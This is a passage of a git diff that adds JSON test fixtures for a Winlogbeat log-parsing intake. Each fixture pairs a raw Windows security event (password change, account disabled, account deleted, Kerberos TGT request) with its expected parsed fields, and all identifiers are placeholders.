Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json new file mode 100644 index 000000000..d3826be97 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4725.json @@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042691344", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json new file mode 100644 index 000000000..73c1d823c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4726.json @@ -0,0 +1,84 @@ +{ + "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "doe.j" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", + "target": { + "domain": "DOMAIN", + "name": "smithee.a" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.domain.net", + "event_id": "4726", + "logon": { + "id": "0x3005c1f76" + }, + "process": { + "pid": 632, + "thread": { + "id": 2056 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "25349190364", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json new file mode 100644 index 000000000..c7ac196ea --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4768.json @@ -0,0 +1,102 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de 